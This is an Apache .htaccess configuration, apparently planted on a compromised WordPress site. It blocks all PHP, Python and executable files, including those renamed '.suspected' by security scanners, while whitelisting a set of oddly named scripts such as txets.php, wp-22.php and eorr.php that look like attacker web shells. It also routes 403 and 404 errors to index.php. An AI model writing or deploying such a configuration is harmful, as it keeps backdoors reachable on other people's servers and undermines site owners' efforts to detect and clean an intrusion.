<FilesMatch ".(PhP|php7|php5|suspected|phtml|py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(txets.php|Base.php|colour.php|DB.php|Decode.php|Module.php|MySQL.php|Sen.php|String.php|wincust.php|index.php|service.php|eorr.php|wp-login.php|wp-22.php|autoload_classmap.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

# Custom error handling
ErrorDocument 403 /index.php
ErrorDocument 404 /index.php